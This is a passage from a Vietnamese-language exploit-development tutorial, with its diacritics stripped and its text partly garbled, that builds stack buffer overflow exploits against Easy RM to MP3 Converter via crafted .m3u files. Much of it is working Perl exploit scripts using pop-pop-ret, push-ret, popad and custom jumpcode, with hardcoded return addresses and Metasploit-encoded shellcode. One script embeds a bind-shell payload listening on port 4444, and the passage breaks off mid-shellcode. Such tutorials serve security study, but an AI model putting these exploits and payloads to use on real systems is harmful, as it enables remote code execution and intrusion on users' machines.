hin:0:000>a7c90120epop eaxpop eax7c90120fpop ebppop ebp7c901210retret7c9012110:000> u 7c90120entdll!DbgBreakPoint:7c90120e 58 pop eax7c90120f 5d pop ebp7c901210 c3 ret7c901211 ffcc dec esp7c901213 c3 ret7c901214 8bff mov edi,edi7c901216 8b442404 mov eax,dword ptr [esp+4]7c90121a cc int 3Cho nn pop pop ret c opcode l 058,0x5d,0xc3ng nhin, chng ta c th s dng cc opcode khc, v nh cc opcode sau y:Hnh 3.21: Mt vi opcodeBy gi chng ta phi tm chui opcode ny trong cc dll c sn. Trong phn mt chng ti ni dll ng dng so vi dll ca h iu hnh. Theo , ti khuyn co s dng dll ca ng dng bi n lm tng tnh tin cy, trnh ph thuc vo phin bn windows. Nhng bn cn chc chn rng dll s dng a ch mi lc. i khi, dll c rebase v trng hp tt hn s dng dll ca OS nh user32.dll hoc kernel32.dll.M Easy RM to MP3 ( v khng m g c) ri nh km windbg vo tin trnh chy. Windbg s hin th cc module c load, gm c OS modules v module ng dng ( tm dng bt u vi ModLoad).y l mt vi dll ca ng dng:ModLoad:00ce0000 00d7f000 C:\Program Files\Easy RM to MP3 Converter\MSRMfilter01.dllModLoad: 01a90000 01b01000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dllModLoad: 00c80000 00c87000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec01.dllModLoad: 01b10000 01fdd000 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dllBn nn hn ch s dng cc a ch cha null bytes bi n lm vic exploit tr nn kh khn hn. Tm kim trong MSRMCcodec00.dll cho ta mt s kt qu:0:014> s 01a90000 l 01b01000 58 5d c301ab6a10 58 5d c3 33 c0 5d c3 55-8b ec 51 51 dd 45 08 dc X].3.].U..QQ.E..01ab8da3 58 5d c3 8d 4d 08 83 65-08 00 51 6a 00 ff 35 6c X]..M..e..Qj..5l01ab9d69 58 5d c3 6a 02 eb f9 6a-04 eb f5 b8 00 02 00 00 X].jj..Gi chng ta c th nhy ti ESP+8. v tr , ta cn t mt a ch ti jmp esp ( nh ni, sau khi RET, s ly a ch t vo EIP. Ti thi im , ESP ang tr ti shellcode ca chng ta nm ngay sau a ch jmp esp).Trong phn mt chng ta thy 0x01ccf23a tr ti jmp esp. Quay tr li perl script ca chng ta, s thay th BBBB ghi EIP bng a ch pop,pop,ret, theo sau l 8bytes NOP ( m phng ESP+8), tip n l a ch jmp esp v tip n l shellcode.Buffer s nh sau:[AAAAAAAAAAAAA][0x01ab6a10][NOPNOPNOPNOPNOPNOPNOPNOP][0x01ccf23a][Shellcode]26094 As EIP 8 bytes offset JMP ESP(=POPPOPRET)Tin trnh exploit nh sau:EIP b ghi bi POP POP RET, ESP tr ti byte u tin trong 8 bytes offset.POP POP RET c thc thi. EIP ly a ch 0x01ccf23a ti ESP+8, ESP tr ti shellcode.EIP b ghi a ch ti jmp esp, ln nhy th hai c thc hin v shellcode c chy.Hnh 3.22: EIP b ghi a ch ti jmp espChng ta s m phng vi mt break v mt s NOP nh l shellcode. Do , chng c th nhy nu lm vic tt.my $file= test1.m3u;my $junk= A x 26094;my $eip = pack(V,0x01ab6a10);my $jmpesp = pack(V,0x01ccf23a);my $prependesp = XXXX;my $shellcode = \x90 x 8;$shellcode = $shellcode . $jmpesp;$shellcode = $shellcode . \xcc . \x90 x 500;open($FILE,>$file);print $FILE $junk.$eip.$prependesp.$shellcode;close($FILE);print m3u File Created successfully\n;N lm vic, by gi thay th NOP sau jmp esp (ESP+8) vi shellcode thc s.3.3.3.Push returnphng php ny hi khc so vi phng php call to register, nu bn khng th tm thy opcode call register hoc jump register, bn c th push a ch vo stack v tin hnh ret. Do , bn cn tm push register theo sau l ret. Nu nh tm c chui ny, mt a ch thc thi chui ny, v ghi EIP vi a ch tm c.push ret tng t nh cal [reg]. Nu c mt thanh ghi tr trc tip ti shellcode ca bn, v mt l do no khng th s dng jmp [reg] nhy ti shellcode, bn c th:t a ch ca thanh ghi vo trong stack, n s nm nh stackret ( ly a ch ny trong stack v nhy ti ) lm c vic ny, bn cn ghi EIP bng a ch ca chui push [reg] ret trong mt th vin dll. Gi s ESP tr trc tip vo shellcode, bn cn tm opcode push esp, theo sau l opcode ret.0:000> a000ff7ae push esppush esp000ff7af retret0:000> u 000ff7ae+0xff79d:000ff7ae 54 push esp000ff7af c3 retOpcode c trnh t 054,0xc3. Tin hnh tm chui opcode ny:Hnh 3.23:Opcode c trnh t 054,0xc3To mt exploit v chy:my $file= test1.m3u;my $junk= A x 26094;my $eip = pack(V,0x01aa57f6);my $prependesp = XXXX;my $shellcode = \x90 x 25# windows/exec 303 bytes#http://www.metasploit.com# Encoder: x86/alpha_upper# EXITFUNC=seh, CMD=calc$shellcode = $shellcode . \x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49 .\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56 .\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41 .\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42 .\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a .\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47 .\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c .\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a .\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50 .\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43 .\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a .\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c .\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44 .\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c .\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47 .\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50 .\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44 .\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43 .\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42 .\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b .\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45 .\x31\x42\x4c\x42\x43\x45\x50\x41\x41;open($FILE,>$file);print $FILE $junk.$eip.$prependesp.$shellcode;close($FILE);print m3u File Created successfully\n;3.3.4.jmp [reg + offset]nu mt thanh ghi tr n stack cha shellcode, nhng khng tr trc tip ti im bt u ca shellcode, bn cng nn c gng tm trong cc lnh ca OS hoc dll m thm cc bytes cn thit vo thanh ghi ri tin hnh jump. Ti gi l phng php jmp [reg + offset].Mt k thut khc khc phc tnh trng shellcode bt u v tr offset ca thanh ghi ( ESP trong v d) l th tm lnh jmp [reg + offset] v ghi EIP bng a ch ca lnh ny. Gi s chng ta cn nhy 8bytes ( nh trong v d trc), s dng k thut jmp reg+offset nhy 8bytes ti trc tip shell code.Chng ta cn 3 th: Tm c opcode ca esp+8h. Tm c a ch tr ti lnh ny. Ghi EIP bng a ch .S dng windbg tm opcode:0:014> a7c90120e jmp [esp + 8]jmp [esp + 8]7c9012120:014> u 7c90120entdll!DbgBreakPoint:7c90120e ff642408 jmp dword ptr [esp+8]Opcode l ff642408By gi bn cn tm kim nhng dll c opcode ny, v s dng a ch ghi EIP. Nhng ti khng th tm c opcode ny bt k u. ng nhin, khng gii hn vic tm kim phi l esp+8, c th l ln hn 8, khi ta s thm mt s NOP cho ph hp.3.3.5.blind returnTrong nhng phn vit trc, ESP tr n v tr nh stack hin hnh. Mt lnh RET khi thc thi s thc hin lnh pop gi tr cui cng ( 4bytes) t stack v t a ch vo EIP. Vy nu bn ghi EIP bng mt a ch thc hnh lnh RET, bn s mang c a ch trong ESP vo EIP. Nu bn phi i mt vi trng hp khng gian b nh c sn trong buffer b gii hn sau khi EIP b ghi ln, nhng li c rt nhiu khng gian trc khi ghi ESP, bn c th s dng lnh jump phn buffer nh nhy v u buffer, ni cha main shellcode.K thut ny gm 2 bc sau: Ghi EIP vi a ch tr ti lnh RET. Bit c a ch 4bytes u ca ESP. Khi lnh RET c thc thi, s ly 4bytes ny ( lc ny ang nh stack) ghi vo EIP. Exploit nhy ti shellcode.K thut ny c tc dng khi: Bn khng th tr EIP ti mt thanh ghi ( v khng tm c lnh jump hay call no). Bn iu kin c ESP. thc hin c, bn cn phi c a ch b nh ca shellcode ( bng a ch stack). Nh thng l, trnh null bytes bn thng t shellcode sau EIP. Nu shellcode t v tr khng c null bytes, n c th lm vic. Tm a ch ca lnh RET trong cc dll. Thit lp 4bytes u ca ESP tr ti ni shellcode bt u, v ghi EIP vi a ch tr ti lnh RET. Nh rng trong phn 1, ESP tr ti 0x000ff730, ng nhin a ch ny thay i theo tng h iu hnh, nhng khng c cch no khc ngoi t cng a ch. Buffer s trng nh sau:[26094 As][address of ret][0x000fff730][shellcode]3.3.6.Dealing with small buffers(jumping anywhere with custom jumpcode)Chng ta ni v cch lm cho EIP nhy ti shellcode ca chng ta. R rng l chng ta thoi mi t shellcode trong buffer ( phn sau EIP). Nhng nu chng ta khng c ln t shellcode vo th sao?Trong v d, chng ta s dng 26094 A ghi ln EIP, v chng ti thy rng ESP tr ti 26094+4bytes, c rt nhiu khng gian pha trc. Nhng nu chng ta ch c 50bytes pha sau. 50bytes lu tr shellcode l khng . V vy, chng ta phi tm xung quanh, v s dng 26094 khi kch hot trn b nh m.u tin, chng ta cn tm 26094 bytes ny u trong b nh. Nu khng tm thy n u, rt kh tham chiu ti. Thc t nu tm thy trong b nh, v mt thanh ghi no tr n th iu tr nn qu d dng.Th kim tra Easy RM to MP3, bn c th thy rng 26094 bytes c th thy trong ESP dump:my $file= test1.m3u;my $junk= A x 26094;my $eip = BBBB;my $preshellcode = X x 54my $nop = \x90 x 230;open($FILE,>$file);print $FILE $junk.$eip.$preshellcode.$nop;close($FILE);print m3u File Created successfully\n;M file test1.m3u chng ta thy 50 X trong ESP. Gi s l khng gian dnh cho shellcode. Tuy nhin, nhn xung di, chng ta thy rng A bt u ti a ch 000ff849 (=ESP+281).Khi nhn vo cc thanh ghi khc, chng ta khng thy du vt no ca X v A. V vy, y chnh l n. Chng ta c th ngy ti ESP thc thi shellcode, nhng chng ta ch c 50bytes. Chng ta s s dng phn b nh khc trong buffer ca chng ta v tr thp hn, thc t chng ta s nhy ti phn ni dung ca ESP, s c phn b nh ln vi A.Hnh 3.24:phn b nh ln vi AA c lu tr v c cch t X nhy ti A, lm c nh vy ta cn mt s iu sau:V tr 26094 A phi nm trong ESP. 000ff849 (Ni no A c th hin trong ESP thc s bt u?) (V vy nu chng ta mun shellcode ca chng ti bn trong cc l A, chng ta cn bit chnh xc ni n cn phi c t)Jumpcode : m chng ta dng nhy t X ti A. M ny khng th ln hn 50 byte (bi v l tt c c sn trc tip ti ESP)Chng ta c th tm v tr chnh xc bng on, custom patterns, metasploit patterns. y chng ta s dng metasploits patterns, to ra 1000 characters v thay th trong perlscript, nn s cn 25101 Asmy $file= test1.m3u;my $pattern = Aa0Aa1Aa2Aa3Aa4Aa.g8Bg9Bh0Bh1Bh2B;my $junk= A x 25101;my $eip = BBBB;my $preshellcode = X x 54;my $nop = \x90 x 230;open($FILE,>$file);print $FILE $pattern.$junk.$eip.$preshellcode.$nop;close($FILE);print m3u File Created successfully\n;Chng ta thy 000ff849 l mt phn mu, 4 k t u l 5Ai6.Hnh 3.25:000ff849 l mt phn muS dng metasploit pattern_offset utility, chng ta thy 4 k t ny offset 257. Nh vy thay v a 26094 A, ti s a 257 A, tip theo l shellcode ca chng ta, v phn cn li l A na. Thm ch tt hn s l bt u vi 250 A, ri 50 NOP, shellcode ca chng ta, ri A. Nu t NOP trc shellcode, n s lm vic tt.Perl script ca chng ta s nh sau:my $file= test1.m3u;my $buffersize = 26094;my $junk= A x 250;my $nop = \x90 x 50;my $shellcode = \xcc;my $restofbuffer = A x ($buffersize-(length($junk)+length($nop)+length($shellcode)));my $eip = BBBB;my $preshellcode = X x 54;my $nop2 = \x90 x 230;my $buffer = $junk.$nop.$shellcode.$restofbuffer;print Size of buffer : .length($buffer).\n;open($FILE,>$file);print $FILE $buffer.$eip.$preshellcode.$nop2;close($FILE);print m3u File Created successfully\n;Khi ng dng cht, chng ta c th thy 50 NOPs ca chng ta bt u t 000ff848, tip theo l shellcode (0x90 ti 000ff874), v sau mt ln na tip theo ca Aiu th hai chng ta cn lm l xy dng jump code. Mc tiu ca jump code l nhy ESP+281. Nhy ESP+281 yu cu: Add 281 vo thanh ghi ESP, sau jump esp. 281 = 119h. ng c gng cho tt c vo mt lnh, hoc opcode s c null bytes.V c NOP pha trc, nn khng cn thit phi chnh xc hon ho. Min l chng ta thm 281 ( hoc hn), n c th lm vic. C 50bytes cho jump code, khng phi l vn .Tin hnh thm 0x5e (94) 3 ln, sau jump to esp, m assemly s l:0:014> a7c901211 add esp,0x5eadd esp,0x5e7c901214 add esp,0x5eadd esp,0x5e7c901217 add esp,0x5eadd esp,0x5e7c90121a jmp espjmp esp7c90121c0:014> u 7c901211ntdll!DbgBreakPoint+0x3:7c901211 83c45e add esp,5Eh7c901214 83c45e add esp,5Eh7c901217 83c45e add esp,5Eh7c90121a ffe4 jmp espOpcode cho jump code s l:0x83,0xc4,0x5e,0x83,0xc4,0x5e,0x83,0xc4,0x5e,0xff,0xe4my $file= test1.m3u;my $buffersize = 26094;my $junk= A x 250;my $nop = \x90 x 50;my $shellcode = \xcc;my $restofbuffer = A x ($buffersize-(length($junk)+length($nop)+length($shellcode)));my $eip = BBBB;my $preshellcode = X x 4;my $jumpcode = \x83\xc4\x5e . #add esp,0x5e\x83\xc4\x5e . #add esp,0x5e\x83\xc4\x5e . #add esp,0x5e\xff\xe4; #jmp espmy $nop2 = 0x90 x 10;my $buffer = $junk.$nop.$shellcode.$restofbuffer;print Size of buffer : .length($buffer).\n;open($FILE,>$file);print $FILE $buffer.$eip.$preshellcode.$jumpcode;close($FILE);print m3u File Created successfully\n;jumpcode t ESP. Khi c gi, ESP tr n NOPs ( gia 00ff842 v 000ff873). Shellcode bt u 000ff874.Cui cng l ghi EIP vi jmp esp, quay li phn 1 ta s c th lm c a ch 0x01ccf23a. Tm li, iu g xy ra khi overflow:Shellcode thc s c t phn u chui, v kt thc ti ESP+300. Shellcode thc s c cch mt s NOP cho php nhy mt s bit.EIP b ghi vi a ch 0x01ccf23a, tr ti jmp espData sau EIP b ghi vi jumpcode thm 282 vo ESP v nhy n .Khi payload c gi, EIP s jump to esp, ri nhy ti ESP+282, Nop b qua, shellcode c thc hin.EIP = 0x000ff874 = begin of shellcodeThay th bng shellcode thc s, thay A bng NOP:my $file= test1.m3u;my $buffersize = 26094;my $junk= \x90 x 200;my $nop = \x90 x 50;# windows/exec 303 bytes#http://www.metasploit.com# Encoder: x86/alpha_upper# EXITFUNC=seh, CMD=calcmy $shellcode = \x89\xe2\xd9\xeb\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49 .\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56 .\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41 .\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42 .\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d .\x38\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55\x47 .\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x43\x31\x4a\x4f\x4c .\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a .\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46 .\x51\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45 .\x57\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c .\x34\x47\x4b\x50\x54\x51\x34\x45\x54\x44\x35\x4d\x35\x4c .\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44 .\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c .\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4b\x39\x51\x4c\x46 .\x44\x45\x54\x48\x43\x51\x4f\x46\x51\x4c\x36\x43\x50\x50 .\x56\x43\x54\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44 .\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x44 .\x48\x4d\x59\x4c\x38\x4d\x53\x49\x50\x42\x4a\x46\x30\x45 .\x38\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b .\x4e\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x42\x43\x43 .\x51\x42\x4c\x45\x33\x45\x50\x41\x41;my $restofbuffer = \x90 x ($buffersize-(length($junk)+length($nop)+length($shellcode)));my $eip = pack(V,0x01ccf23a);my $preshellcode = X x 4;my $jumpcode = \x83\xc4\x5e . #add esp,0x5e\x83\xc4\x5e . #add esp,0x5e\xff\xe4; #jmp espmy $nop2 = 0x90 x 10;my $buffer = $junk.$nop.$shellcode.$restofbuffer;print Size of buffer : .length($buffer).\n;open($FILE,>$file);print $FILE $buffer.$eip.$preshellcode.$jumpcode;close($FILE);print m3u File Created successfully\n;3.3.7.SEH(Structured Exception Handling)Mi ng dng c nhng x l ngoi l mc nh c cung cp bi OS. V vy ngay c khi ng dng khng s dng x l ngoi l, bn vn c th th ghi ln phn x l SEH bng a ch ca bn v lm n nhy ti shellcode ca bn. S dng SEH lm cho exploit tr nn tin cy trn nhiu nn tng Windows, nhng i hi nhiu k nng hn trc khi bt u li dng SEH xy dng exploit. tng y l gi s bn xy dng mt exploit khng hot ng c trn OS cho, phn payload s gy crash ng dng, kch hot mt ngoi l ( trigger). V vy bn c th kt hp mt exploit thng thng vi mt SEH exploit thnh mt exploit tin cy. Phn ba ca loi tutorial s ni v SEH exploit. Ch cn nh rng, c im in hnh ca stack based overflow l ghi ln mt EIP, c kh nng gi ti mt SEH exploit c bn cho php tin cy hn, mt buffer c kch thc ln hny l mt k thut kh, i hi nhiu thi gian v cng sc c th nghin cu chi tit k thut ny.3.3.8.Mt s k thut khcPopad: lnh ny gip chng ta nhy ti shellcode kh tt. popad (pop all double) s ly double words t trong stack (ESP) vo cc thanh a nng ch trong mt ln. Th t cc thanh ghi c np l: EDI, ESI, EBP, EBX, EDX, ECX v EAX. Kt qu l ESP s tng ln sau mi ln load vo, mt popad s ly 32bytes t ESP v t vo cc thanh ghi theo th t.Popad c opcode l 0x61.Gi s bn cn nhy 40bytes, m ch c vi bytes thc hin lnh nhy, c th dng 2popad tr ESP ti shellcode ( vi mt vi bytes NOP b vo 232 40)By gi chng ta s s dng Easy RM to MP3 demo k thut ny. Vn s dng script c, chng ta s xy dng buffer gi ti 13 X, tip theo l mt s bytes rc ( D v A), ri n shellcode ca chng ta ( NOP+A).my $file= test1.m3u;my $buffersize = 26094;my $junk= A x 250;my $nop = \x90 x 50;my $shellcode = \xcc;my $restofbuffer = A x ($buffersize-(length($junk)+length($nop)+length($shellcode)));my $eip = BBBB;my $preshellcode = X x 17;my $garbage = \x44 x 100my $buffer = $junk.$nop.$shellcode.$restofbuffer;print Size of buffer : .length($buffer).\n;open($FILE,>$file);print $FILE $buffer.$eip.$preshellcode.$garbage;close($FILE);print m3u File Created successfully\n;M file bng Easy RM to MP3, ng dng s b sp Gi s chng ta c 13X s dng ( s t popad y) nhy qua 100 D v 160 A, tng cng l 260bytes s n shellcode ca chng ta ( bt u bng NOP ri n 1 break cc ri n A). Mt popad = 32bytes, 260bytes = 9popad ( -28bytes), v vy cn phi bt u shellcode vi NOPs, hoc bt u shellcode cch 28bytes. Trng hp ca chng ta s t NOP trc.Trc tin ghi EIP vi jmp esp ( xem li cc phn trc). Sau , thay X bng 9 popad, tip n l opcode jmp esp (0xff,0xe4).my $file= test1.m3u;my $buffersize = 26094;my $junk= A x 250;my $nop = \x90 x 50;my $shellcode = \xcc;my $restofbuffer = A x ($buffersize-(length($junk)+length($nop)+length($shellcode)));my $eip = pack(V,0x01ccf23a);my $preshellcode = X x 4;$preshellcode=$preshellcode.\x61 x 9;$preshellcode=$preshellcode.\xff\xe4;$preshellcode=$preshellcode.\x90\x90\x90;my $garbage = \x44 x 100;my $buffer = $junk.$nop.$shellcode.$restofbuffer;print Size of buffer : .length($buffer).\n;open($FILE,>$file);print $FILE $buffer.$eip.$preshellcode.$garbage;close($FILE);print m3u File Created successfully\n;Sau khi ng dng sp , dng ti im break, ESP v EIP nh sau: eip=000ff874esp=000ff850Popad lm vic v t ESP ti NOP ca shellcode, sau thc hin jmp esp (0xff 0xe4) lm EIP tr ti NOP. Thay th A bng shellcode thc s:Mt cch khc( t c a thch nhng vn c kh nng) l nhy n shellcode bng jumpcode s dng a ch ( hoc offset ca thanh ghi). T khi m a ch thanh ghi khc nhau trong cc chng trnh thc thi cch ny khng cn c hiu qu.V vy, tin hnh hardcode a ch hoc offset ca thanh ghi, bn cn tm opcode nhy, sau , s dng opcode ny trong on buffer nh nhy ti shellcode thc ca bn.Di y l 2 v d gip bn tm c opcode:1. jump to 0x123456780:000> a7c90120e jmp 12345678jmp 123456787c9012130:000> u 7c90120entdll!DbgBreakPoint:7c90120e e96544a495 jmp 12345678=> opcode is 0xe9,0x65,0x44,0xa4,0x952. jump to ebx+124h0:000> a7c901214 add ebx,124add ebx,1247c90121a jmp ebxjmp ebx7c90121c0:000> u 7c901214ntdll!DbgUserBreakPoint+0x2:7c901214 81c324010000 add ebx,124h7c90121a ffe3 jmp ebxOpcode l 0x81,0xc3,0x24,0x01,0x00,0x00 (add ebx 124h) v 0xff,0xe3 (jmp ebx).Nhy ngn v nhy c iu kin.Trong trng hp bn ch cn nhy qua mt vi bytes, bn c th dng k thut short jump thc hin:short jump : (jmp) : opcode 0xeb, theo sau l s bytes cn nhy. V d, mun nhy 30 bytes, the opcode l 0xeb,0x1e.Trong trng hp bn mun nhy c iu kin ( khi iu kin c p ng), bn s dng conditional (short/near) jump. K thut ny s dng trng thi ca cc thanh ghi c EFLAGS (CF,OF,PF,SF v ZF). Nu nhng c ny trng thi c bit ( do iu kin), c th lm cho nhy n mc tiu theo ton hng ch.V d: gi s bn mun nhy 6bytes, nhn vo c ( ollydbg) v trng thi c, bn c th dng cc opcode sau:Nu c Zero l 1, bn c th dng opcode 0x74, tip theo l s bytes cn nhy, l 0x06 trong v d ny.Bng opcode ca cc lnh nhy v c[18]Da vo bng, bn cng c th nhy nu ECX bng 0. Trong trng hp SEH, cc thanh ghi s b xa khi ngoi l xy ra, bn c th s dng opcode 0xe3 nhy (ECX = 00000000).Backward jumps:Trong trng hp bn mun nhy ngc li ( nhy vi offset lm s m): ly s nghch o v chuyn v dng hex. Gi tr dword hex c s dng nh l argument cho jump (\xeb hoc \xe9).V d : jump back 7 bytes : -7 = FFFFFFF9, cho nn jump -7 s l: \xeb\xf9\xff\xffV d na: jump back 400 bytes : -400 = FFFFFE70, cho nn jump -400 bytes = \xe9\x70\xfe\xff\xff ( bn c th thy opcode di 4bytes, trong khi mt dword size (4 byte limit), v th bn cn thc hin nhiu bc nhy chia nh bc nhy ra).3.4.SHELLCODEBACKDOORBn c th to ra shellcode khc v thay th calc shellcode vi shellcode mi ca bn. Nhng n c th khng hot ng c v shellcode c th c ln hn, v tr b nh c th khc nhau, v shellcode di lm tng nguy c c nhng invalid characters k t khng hp l, cho nn cn chn lc.Gi s mun mt shellcode: lng nghe trn mt port c th connect ti.Shellcode trng nh sau:# windows/exec - 144 bytes# http://www.metasploit.com# Encoder: x86/shikata_ga_nai# EXITFUNC=seh, CMD=calcmy $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" ."\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" ."\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" ."\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" ."\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" ."\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" ."\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" ."\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" ."\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" ."\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" ."\x7f\xe8\x7b\xca";Nh bn thy, shellcode ny di 344byte, trong khi calc l 144byte, bn s thy ng dng b crash:Hnh 3.26:shellcode di 344byte ng dng b crashiu ny rt c th ch ra mt vn vi kch thc shellcode (nhng bn c th kim tra kch thc buffer, bn s nhn thy rng y khng phi l vn ). Hoc c nhng invalid characters trong shellcode. Bn c th loi tr cc k t ny vi Metasploit, nhng bn cn bit k t no c k t no khng. Mc nh, null bytes b hn ch, nhng cn nhng k t no khc?Cc tp tin m3u cha filename, nn mt cch lc l loi cc k t cha trong filename v filepath. Bn cng c th hn ch bng cch s dng mt decoder khc. Chng ti s dng shikata_ga_nai, nhng c l alpha_upper lm vic tt hn vi filename. S dng encoded khc c th lm tng di shellcode, nhng nh thy, kch thc khng phi vn qu ln.Chng ta s th tcp shell bind,s dng alpha_upper encoder, lng nghe trn cng 4444. Shellcode ny c di 703bytesmy $file= exploitrmtomp3.m3u;my $junk= A x 26094;my $eip = pack(V,0x01ccf23a);my $shellcode = \x90 x 25;# windows/shell_bind_tcp 703 bytes#http://www.metasploit.com# Encoder: x86/alpha_upper# EXITFUNC=seh, LPORT=4444, RHOST=$shellcode=$shellcode.\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49 .\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56 .\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41 .\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42 .\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42 .\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b .\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47 .\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a .\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43 .\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a .\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44 .\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a .\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a .\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c .\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a .\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45 .\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50 .\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45 .\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c .\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43 .\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43 .\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42 .\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48 .\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43 .\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42 .\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48 .\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51 .\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42 .\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42 .\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48 .\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43 